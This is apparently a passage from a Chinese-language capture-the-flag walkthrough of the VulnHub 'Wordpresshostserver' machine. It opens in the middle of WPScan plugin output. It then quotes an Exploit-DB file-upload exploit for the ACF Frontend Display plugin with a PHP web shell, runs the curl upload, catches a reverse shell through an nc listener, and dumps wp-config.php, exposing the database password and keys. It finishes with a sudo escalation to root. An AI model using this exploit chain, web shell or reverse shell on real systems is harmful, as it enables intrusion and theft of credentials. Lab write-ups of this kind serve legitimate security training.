| Location: https://192.168.56.201/wp-content/plugins/spider-event-calendar/
| Last Updated: 2021-12-07T14:18:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/spider-event-calendar/readme.txt
| [!] The version is out of date, the latest version is 1.5.65
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/spider-event-calendar/, status: 200
|
| Version: 1.5.51 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/spider-event-calendar/readme.txt
[+] ultimate-product-catalogue
| Location: https://192.168.56.201/wp-content/plugins/ultimate-product-catalogue/
| Last Updated: 2023-01-04T21:02:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/ultimate-product-catalogue/readme.txt
| [!] The version is out of date, the latest version is 5.2.3
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ultimate-product-catalogue/, status: 200
|
| Version: 4.2.2 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ultimate-product-catalogue/readme.txt
[+] wp-cerber
| Location: https://192.168.56.201/wp-content/plugins/wp-cerber/
| Last Updated: 2022-05-10T21:32:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-cerber/readme.txt
| [!] The version is out of date, the latest version is 9.0
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-cerber/, status: 200
|
| Version: 8.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-cerber/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-cerber/readme.txt
[+] wp-easy-slideshow
| Location: https://192.168.56.201/wp-content/plugins/wp-easy-slideshow/
| Readme: https://192.168.56.201/wp-content/plugins/wp-easy-slideshow/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-easy-slideshow/, status: 200
|
| The version could not be determined.
[+] wp-easycart
| Location: https://192.168.56.201/wp-content/plugins/wp-easycart/
| Last Updated: 2022-12-08T01:58:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-easycart/readme.txt
| [!] The version is out of date, the latest version is 5.3.15
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-easycart/, status: 200
|
| Version: 3.0.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-easycart/readme.txt
[+] wp-google-places-review-slider
| Location: https://192.168.56.201/wp-content/plugins/wp-google-places-review-slider/
| Last Updated: 2023-01-02T22:07:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-google-places-review-slider/README.txt
| [!] The version is out of date, the latest version is 11.7
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-google-places-review-slider/, status: 200
|
| Version: 6.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-google-places-review-slider/README.txt
[+] wp-jobs
| Location: https://192.168.56.201/wp-content/plugins/wp-jobs/
| Last Updated: 2020-09-14T12:22:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-jobs/readme.txt
| [!] The version is out of date, the latest version is 2.3.1
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-jobs/, status: 200
|
| Version: 1.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-jobs/readme.txt
[+] wp-like-button
| Location: https://192.168.56.201/wp-content/plugins/wp-like-button/
| Last Updated: 2022-10-13T10:32:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-like-button/readme.txt
| [!] The version is out of date, the latest version is 1.6.10
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-like-button/, status: 200
|
| Version: 1.6.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-like-button/readme.txt
[+] wp-responsive-thumbnail-slider
| Location: https://192.168.56.201/wp-content/plugins/wp-responsive-thumbnail-slider/
| Last Updated: 2022-11-07T03:23:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
| [!] The version is out of date, the latest version is 1.1.9
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-responsive-thumbnail-slider/, status: 200
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
[+] wp-support-plus-responsive-ticket-system
| Location: https://192.168.56.201/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| [!] The version is out of date, the latest version is 9.1.2
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-support-plus-responsive-ticket-system/, status: 200
|
| Version: 7.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
[+] wp-with-spritz
| Location: https://192.168.56.201/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wp-with-spritz/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-with-spritz/, status: 200
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wp-with-spritz/readme.txt
[+] wpforms-lite
| Location: https://192.168.56.201/wp-content/plugins/wpforms-lite/
| Last Updated: 2023-01-05T12:27:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/wpforms-lite/readme.txt
| [!] The version is out of date, the latest version is 1.7.9
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wpforms-lite/, status: 200
|
| Version: 1.5.8.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wpforms-lite/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/wpforms-lite/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Feb 26 22:52:55 2023
[+] Requests Done: 102086
[+] Cached Requests: 113
[+] Data Sent: 27.305 MB
[+] Data Received: 17.461 MB
[+] Memory used: 519.797 MB
[+] Elapsed time: 00:09:34
发现插件# ACF Frontend Display 2.0.5可以上传任意文件:
https://www.exploit-db.com/exploits/37514
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
File Path: site/wp-content/uploads/uigen_YEAR/file.php
Example: site/wp-content/uploads/uigen_2015/evil.php
evil.php: <?php passthru($_GET['cmd']); ?>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Wordpresshostserver]
└─$ curl -k -X POST -F "action=upload" -F "files=@/home/kali/Desktop/Vulnhub/Wordpresshostserver/shell.php" "https://192.168.56.201/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
[{"name":"shell.php","size":5496,"type":"application\/octet-stream","url":"https:\/\/www.armourinfosec.test\/wp-content\/uploads\/uigen_2023shell.php","delete_url":"https:\/\/192.168.56.201\/wp-content\/plugins\/acf-frontend-display\/js\/blueimp-jQuery-File-Upload-d45deb1\/server\/php\/?file=shell.php","delete_type":"DELETE"}]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Wordpresshostserver]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.201] 47842
Linux armourinfosec.test 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
22:59:30 up 31 min, 0 users, load average: 0.04, 1.76, 2.88
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.2$ which python
which python
/usr/bin/python
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ cd /home
cd /home
bash-4.2$ ls -alh
ls -alh
total 0
drwxr-xr-x. 2 root root 6 Nov 5 2016 .
dr-xr-xr-x. 17 root root 244 Feb 21 2020 ..
bash-4.2$
bash-4.2$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Aedcvfr2-4%$3456yhnbgtA' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '-0Br](6b~4!na}H,C#-`}-b^UfkDq9(Oe>0fY(e1}8K2;[j{ 6o[g`<GL[RsY]S=' );
define( 'SECURE_AUTH_KEY', 'b4kAJ%=hH1E=r,H((yOECP{*)]?~`]EeD!TFBmmB@E^ 9y|,+^NfP,(*$vYgzzx>' );
define( 'LOGGED_IN_KEY', '*rCx-s7+>~oghfYQ(%N|vIP/3tqGtLMiOGRIttsd;nhd#T/:+>?(5rCH4C)F,+Y/' );
define( 'NONCE_KEY', ' fKV6h%(HJ1`=1(ru]8g_lb|%jnfOny]vYqaXY=[d<CTjD( O=f*_-e3)a*N4 0T' );
define( 'AUTH_SALT', 'Oq{7-9kmMEGmdC9n4(!/Mj<}{=VTN5-5Wnr2`FKN}x5 =Cneyy~Sv%9~!7dCjU3o' );
define( 'SECURE_AUTH_SALT', '|}q:EX>-RS^.:E.NF_2Vyh^$E:`!U}kRVDVgBQH0`+ekC6cr%Q38$-)liMyy,R$`' );
define( 'LOGGED_IN_SALT', '%LMMi9yCtPWn0?sLckpO*HX}zoALDLZvcn{2j)3Gg,qK?G[3L(O&FzdV{32|DWQ!' );
define( 'NONCE_SALT', 'flm:XWco*{[]ZY^N9L]T@R%Z_+<M5D(B^Jf#R.kvqaZaB-QHO_)8VD37bF1Rjyp1' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );
bash-4.2$ su - root
su - root
Password: Aedcvfr2-4%$3456yhnbgtA
su: Authentication failure
bash-4.2$
数据库密码并不是root密码。
提权
bash-4.2$ sudo -l
sudo -l
Matching Defaults entries for apache on armourinfosec:
!visiblepw, always_set_home, match_group_by_gid, env_reset,
env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User apache may run the following commands on armourinfosec:
(ALL) NOPASSWD: ALL
bash-4.2$ sudo /bin/bash
sudo /bin/bash
[root@armourinfosec tmp]# cd /root
cd /root
[root@armourinfosec ~]# ls -alh
ls -alh
total 36K
dr-xr-x---. 3 root root 175 Feb 21 2020 .
dr-xr-xr-x. 17 root root 244 Feb 21 2020 ..
-rw-------. 1 root root 101 Feb 21 2020 .bash_history
-rw-r--r--. 1 root root 18 Dec 28 2013 .bash_logout
-rw-r--r--. 1 root root 176 Dec 28 2013 .bash_profile
-rw-r--r--. 1 root root 176 Dec 28 2013 .bashrc
-rw-r--r--. 1 root root 100 Dec 28 2013 .cshrc
-rw-------. 1 root root 106 Jan 30 2020 .mysql_history
drwxr-----. 3 root root 19 Jan 30 2020 .pki
-rw-------. 1 root root 1.0K Jan 30 2020 .rnd
-rw-r--r--. 1 root root 129 Dec 28 2013 .tcshrc
-rw-r--r-- 1 root root 46 Feb 21 2020 proof.txt
[root@armourinfosec ~]# cat proof.txt
cat proof.txt
Best of Luck
9cbb7b691687c480ce9acf2a392bc77e
STRIVE FOR PROGRESS,NOT FOR PERFECTION